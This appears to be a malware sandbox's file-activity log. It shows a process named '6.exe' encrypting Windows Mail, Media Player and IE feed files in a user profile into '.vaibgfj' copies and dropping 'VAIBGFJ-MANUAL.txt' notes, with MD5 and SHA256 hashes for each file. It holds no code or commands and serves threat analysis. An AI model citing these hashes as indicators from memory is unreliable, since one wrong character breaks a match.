C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Shades of Blue.htm
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Seyes.emf.vaibgfj
binary
MD5: 218c6e98557f135f2a2bdda6a68cb66e
SHA256: 9c7094ae2a70c8511f6b2f0aa79fd2bc2870f2cb51f8308043dd087235c7ad4e
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Seyes.emf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg.vaibgfj
binary
MD5: 54d5df2fc9402f998fc875a4aa553976
SHA256: 4a894b30edefbc5df19ef470b7e2604409b0ea36dec0db5fe3ff19cf84e60f43
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Sand_Paper.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg.vaibgfj
binary
MD5: b058027ca6ac01f85f172dd455a7ea70
SHA256: e69d56a9b24cb91fd61991232cdb0d9669754dd40456a57c74cfbaa0b83f90d4
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm.vaibgfj
binary
MD5: 1ea92881573b17806932d0e2d46c7bbc
SHA256: 11815ec37369135313813f831989c4b3c844092dc156c193a0321bcc5b9769e9
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Roses.htm
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg.vaibgfj
binary
MD5: 5a6cfb9608074381c6b966bbd3c138ab
SHA256: 340258f31ae8efcd54d26a705919712d3b08ab306eb9c41c287ae740f84d42e8
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Psychedelic.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg.vaibgfj
binary
MD5: bd1526d5761e986a2b1b024654737d45
SHA256: e1dd7ed3ad3a5defec4091dedd389a9f3efb27d61317980301362ae0d1cb7dc9
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pretty_Peacock.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg.vaibgfj
binary
MD5: 9077e56ff20ee394b16f9e6c4ddab132
SHA256: 5a187e452b05e82eb87e48d365ee5c2724e7d170b520a1695bf720f71823a116
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Pine_Lumber.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg.vaibgfj
binary
MD5: 759e58558e147241bc64b2043cf2f16c
SHA256: 3c2de43b5ca2c155e3ddebc0063335f11693a2d5e83762802cddc1119ff256d2
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm.vaibgfj
binary
MD5: 91d4fc09fdd2511ebbe5c7629447e0c3
SHA256: f947c4f53e5824377fb96334a8cc023c220cf166e0076dd20235161c08bb98a0
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Peacock.htm
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg.vaibgfj
binary
MD5: 8cc6a691f70641e8edf83b65df96977d
SHA256: d8a6c221c7b171f3ab1fdbfc047b868ad8c90160f68c07c1c0b2d2cc2c6ceda2
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\OrangeCircles.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm.vaibgfj
binary
MD5: 0e49b4e72cfcfc039b7c87b85590581e
SHA256: d58f63afd6eaa3e3484251b3285aa503bf5cfce986966c184158e33d053fafa2
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Orange Circles.htm
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg.vaibgfj
binary
MD5: b63c1f810644be4ad06cab8cb8d39dd0
SHA256: ab04bf07328d36927d2d446c090f3d7d51c49d5ebc4dee1fc75e746fc57bd59e
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Notebook.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Music.emf.vaibgfj
binary
MD5: 45da8e10c7ffe3673907106993fde5f5
SHA256: beb4d36be6843114acda8c1f09a374df7d565ace4993202594feb9c1d405ce32
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Music.emf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Month_Calendar.emf.vaibgfj
binary
MD5: 99682911f9b9a797b2c9b6fe547b11b7
SHA256: 0a05f1809af83b89c02773266440d4ba02e158d327b843c24d5890bedfccf635
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Month_Calendar.emf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg.vaibgfj
binary
MD5: dd043882ca6fc72098dafe78bf647b93
SHA256: 18f448bbae59378d25ab41fc1139724508a4218fd88a20356fcb9900df6bb9c8
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Monet.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Memo.emf.vaibgfj
binary
MD5: 43272419e59b21beabef0b755c1144a5
SHA256: 97849c1905cadc083cd4d14a1918d6aacd94790286eb4c2116f4fa0e73885bf8
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Memo.emf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg.vaibgfj
flc
MD5: 6834d3f2dcfc243df2e0980c3d0d10f5
SHA256: 7b51bb1a93b2a4fed42bcd603a84456ba2d50776d2ab6393fc4ff35c10a4615d
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\HandPrints.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm.vaibgfj
binary
MD5: 4fb6b34d1414538c3a1c23e79021b96f
SHA256: 1da1bf69e18b1b7806dc37f4a003dc6ef008ca0cd5a3c8ab6f995a951b37ad2a
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Hand Prints.htm
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(inch).wmf.vaibgfj
binary
MD5: 1c428de3e73d62121969911d43e90179
SHA256: 9591623ec9c993243a72161c4d36027aa721cb43b8aa0bbc5f2332a958a96941
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(inch).wmf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(cm).wmf.vaibgfj
binary
MD5: 9dee678180a38a936e52a9009607f6e3
SHA256: 8e61ed7d3719aea4ee8cfacc0f057150452c7cd6d0075b0bdeebf49ebc6b0504
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\grid_(cm).wmf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg.vaibgfj
binary
MD5: 1f3025d6ae5434708bd8c9415ebfd363
SHA256: 395576b53f24b6fd1f38a11156601d46b3189e5f367e281ce19f7249ee2715d5
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\GreenBubbles.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm.vaibgfj
binary
MD5: e7a33562d7e052d94544e6e8dfbd6958
SHA256: 0ebeea465c929c430a120e43a65db6061f2ac8d06b23f9cda78e54a2b5fa0f7d
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Green Bubbles.htm
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Graph.emf.vaibgfj
binary
MD5: 6aea6efe09e84685b3d639173b1e8f7d
SHA256: b15e499f2d8c247f3387d2377cab087e84aa7957ea6ad635d95d53c361622289
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Graph.emf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_2.emf.vaibgfj
binary
MD5: 620415bc4c9e81b71262e9c41dd748fe
SHA256: 62c69902271757e4caa8ff2fa2bdd8783fbb22b6248981a5465614bfaa12eeb0
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_2.emf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_1.emf.vaibgfj
binary
MD5: 35bbdc62d5d05242f1c909134f31a500
SHA256: 98f5895cffd304e3a719361c1c6569d7e2fd4ed9a3297786926245232e5a5e44
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Genko_1.emf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg.vaibgfj
binary
MD5: 6adacdce6b0e5942656a042b2b16791d
SHA256: 8debebc90cc1ebf0baa202f179935ad96033e899ebf79f0ce639ca21f2a92ab5
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm.vaibgfj
binary
MD5: 3fe0657fa9948b94fc218bf561a8535a
SHA256: ab15b113a569bd742eadc50ce5dad42d578adb6ebd39f729fefe72bd2b32ead0
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Garden.htm
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Dotted_Lines.emf.vaibgfj
binary
MD5: 93a0f0832a6d9c668f8309d866bbabf5
SHA256: fc5a4b31d0005c9c8b0f91f046fad13d7123e50980878159ac03d683b97def87
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Dotted_Lines.emf
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Connectivity.gif.vaibgfj
binary
MD5: 823a4634f4dd66ebabc248dff3f7bb06
SHA256: fe3aec38c6d6a36d5fb10f955ebc17ead65c0d776263b484bb98fd10e7381ae5
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Connectivity.gif
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Cave_Drawings.gif.vaibgfj
binary
MD5: 97b32b11b32702b94927f544f9a57044
SHA256: ca9564567b952ebe4ede7cbccccbdd3999d96a644c1d818533515c1801191215
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Cave_Drawings.gif
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg.vaibgfj
binary
MD5: e4cad7f321b37e3a78781acc2e716ff2
SHA256: e7513101943759e92c6012642740906e9820ec8e8d599635fcfff71f95a877e5
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Blue_Gradient.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg.vaibgfj
binary
MD5: 64b77de7e20b6eab052afa345ca3f068
SHA256: 34b0d1c45d1e74687604e0f64f9c62543dea200ac0542a88140b28c8ae0043a0
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.jpg
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm.vaibgfj
binary
MD5: 86af735ca3f8221367f665d543216ef6
SHA256: 1f4d8e9c4187fb7bce58d8811975a0a638f4295fad1001e6e6c1d0bb0c1471ed
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\Bears.htm
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\oeold.xml.vaibgfj
binary
MD5: 58fb40583ae750345c2155109fcbfe27
SHA256: 590f58571baceb2534fd41e30bff37c410545384882ff242b21cca4aad34311f
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Stationery\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs.vaibgfj
binary
MD5: 9eeecbc184a1022f441782364cd65d2c
SHA256: ee8f82404c6ebd04a6b0cb286d84ceebddecc855cdb191cc38d2ca946a9ee24b
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\oeold.xml
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00002.jrs
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs.vaibgfj
binary
MD5: a57f0702eb4814711c2d196b2a1bb70e
SHA256: c518963b271bc6e2964fa7adc3aa964f5f38e5d910df8a691c212fa84a3cb0e1
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edbres00001.jrs
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb00001.log.vaibgfj
binary
MD5: 576dc2035bde082e4dfb52044586e0f7
SHA256: 91f8f9e7fb6a2f8a10327d1288dfe747c4e35b83b9c674ad2b2fd65ee7221f5a
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb00001.log
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.log.vaibgfj
binary
MD5: 374e03814779b33ac94f77e08a147465
SHA256: 792ecf9c6fd2403e6e70433117e61e11593d8cebbf90ecf174ecfac13bfdc914
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.log
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.chk.vaibgfj
binary
MD5: 8c74b6725b0138c3d4905e7ac8211f61
SHA256: e5dbe12b9cc0e42f1b61c84012584951c07d4736e58507182284d95ae88d52a0
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat.vaibgfj
binary
MD5: f3ba2b5671ccb9a0f1071c3ddf6e012d
SHA256: c91d8522b8abbf4b0f2137ea4307fd59d274913174a086cf5aa20f62b9458da6
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore.vaibgfj
binary
MD5: 932ddd2aac45c288f086ab3a20ccc9d1
SHA256: aad72342824ae96e8da997bece515f299fea0da2fc536b681fdfc894e973c171
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\edb.chk
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.pat
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\WindowsMail.MSMessageStore
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log.vaibgfj
binary
MD5: 62b514ccc7cb98d798f2c0396ecbb0f1
SHA256: 408f7fea94fd517df9f176a8e27a842e242e66b75370c0e511393d76102f7cb7
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\edb00001.log
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\Backup\new\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{C6756DF7-BE4A-458E-9C7E-535BEC29FB9E}.oeaccount.vaibgfj
binary
MD5: 01fa282db9d9b48776f781b6fd2253b4
SHA256: 11bb416e5a634963efeccde26e0bd362ebe10f965040d0ea69206705f787ce76
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{CBB626B1-8A75-4171-911F-13C42949168F}.oeaccount.vaibgfj
binary
MD5: 33980f720d0db1249828e1fb2001615c
SHA256: 6e3193eda525bf5fe81638be89d16115e7f263ecf3e8e1c14fe7c8eea89641c7
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{CBB626B1-8A75-4171-911F-13C42949168F}.oeaccount
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{C6756DF7-BE4A-458E-9C7E-535BEC29FB9E}.oeaccount
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{A9BA3523-71CE-43CF-BD95-F75C31E87D1A}.oeaccount.vaibgfj
binary
MD5: 59e118823d944b267ac57ec78045d46f
SHA256: 6d43cbf86702bf8a5b6b9ccf540f19b4bf537e23b770e57dcd3dec88946f31d3
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\12_All_Video.wpl.vaibgfj
binary
MD5: 8fe3ff90d15b86627f4382ac1cfb16f9
SHA256: 890bc8067a193239421daea00be4e349a54a0007fc23a32b53fa5055e7b53a87
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Windows Mail\account{A9BA3523-71CE-43CF-BD95-F75C31E87D1A}.oeaccount
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\11_All_Pictures.wpl.vaibgfj
vc
MD5: 3114c26636594e5363dba8a86501baf0
SHA256: 21cb82caa7c41a2966533963c3b2f9da8a3992e4e100bea09ec6e2151a6af79b
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\10_All_Music.wpl.vaibgfj
binary
MD5: 89529c13f8cc586cd3ba856d34ef1a3c
SHA256: 77ee7acdd7ee14a4a9468a709ccb770775a19c7dd6831f531d662575b433715f
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\11_All_Pictures.wpl
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\12_All_Video.wpl
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\10_All_Music.wpl
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\09_Music_played_the_most.wpl.vaibgfj
binary
MD5: f3eeac53e2b6f57741d592cc2cadc829
SHA256: 2786fff1b3889f566f7f288a56ea3422b818a87531f104be58390673830e64a5
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\07_TV_recorded_in_the_last_week.wpl.vaibgfj
binary
MD5: 1e94d6d46d9bd126f6f2ab18dcf0056c
SHA256: fefc61d88f67ffea2b1b24b680659e91263e865d63e1b5399c1cc714f1f49c3f
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\06_Pictures_rated_4_or_5_stars.wpl.vaibgfj
binary
MD5: d6340cca760b8817a30733081347c765
SHA256: b0ae7bfd5e0f786559e20d43549160d774c97b7c3e32d8d88d7f6a058da1fa98
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\08_Video_rated_at_4_or_5_stars.wpl.vaibgfj
binary
MD5: ad4bcd07e22e1a0456a8b0af5efed95e
SHA256: 101ce56c6617ff43b50b68a09d2d9cabd4b8914d747da65fc2608b60732485aa
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\08_Video_rated_at_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\09_Music_played_the_most.wpl
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\07_TV_recorded_in_the_last_week.wpl
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\05_Pictures_taken_in_the_last_month.wpl.vaibgfj
binary
MD5: e7fe272e52604f8d16ccea6e4ffa2504
SHA256: 7c34d8fe94ed1cce44359bd9e56bcb95554289ac2605b2b0d2e1a51612196efa
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\06_Pictures_rated_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\05_Pictures_taken_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\04_Music_played_in_the_last_month.wpl.vaibgfj
binary
MD5: 8d64c32bdd782f737477035011ff41f8
SHA256: 0d08508dc7d9b1b86e5ca0f72febaaeb5811540000c5a4a8e02c4c2e6fab25c3
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\03_Music_rated_at_4_or_5_stars.wpl.vaibgfj
binary
MD5: a877132a1f508e8401ec471192271777
SHA256: 8095cf5b58d4a425328795dcfbe7d37929dc71af93800c4b93b639a837a87fb0
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\04_Music_played_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\03_Music_rated_at_4_or_5_stars.wpl
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\01_Music_auto_rated_at_5_stars.wpl.vaibgfj
binary
MD5: 672c4aa2783d84fdc8787e98ae960570
SHA256: 8c356775c9e2af73fdedc66cf84388df7c029f5b16d742111fc5b86ce98d6347
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\02_Music_added_in_the_last_month.wpl.vaibgfj
binary
MD5: 2f24536223065c68e508a450415d512d
SHA256: 638c75f4c0514f7e75c6b566a1a9ba8a16cbbf6c54e97f5db272bd1a174a8461
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\02_Music_added_in_the_last_month.wpl
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\01_Music_auto_rated_at_5_stars.wpl
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00015D2E\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb.vaibgfj
binary
MD5: 6e64b26e37b89d797f99bb7d3f8a7dfc
SHA256: a62a3a2d4dd4ec735faafc581f015ebd253a1a0496d6f9301d23573c3283750a
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb.vaibgfj
binary
MD5: 52211b1fde5398737bbaa4bd0c406a55
SHA256: c5a2ab7a0db76687d64ce25265f4c19441697b11d36474dd4cf2928291b1ec57
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\CurrentDatabase_372.wmdb
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Media Player\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.vaibgfj
binary
MD5: ef8d9a0140a2a27e8edd4a24dfef2c90
SHA256: 849346abcb788529c4b3e2a6f444cd481293525aafea3eb74ede624e2f26bb15
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
––
MD5:  ––
SHA256:  ––
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\VM3JD5NM\VAIBGFJ-MANUAL.txt
text
MD5: de602ba7989433bb470e83f62e1a53f8
SHA256: a2a61589bb51bc1f6c0688b376af96409765bd81635aa2a6f70de6811c472f5c
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds Cache\index.dat.vaibgfj
binary
MD5: 49af7a2cc58f6e444300c9aac59f6ad1
SHA256: 67a4344a4e302427551908c11f2685229597aa9aa35e65be4a20d5507e06e9c6
3020
6.exe
C:\Users\Administrator\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Web Slice Gallery~.feed-ms.vaibgfj
binary
MD5: b1ba795a090879d659cb53a879127a9c
SHA256: 831c476b82e13ea2c1a6b4762fd49c40f76b65542f06158d0212cb7e84fa631f
3020
6.exe
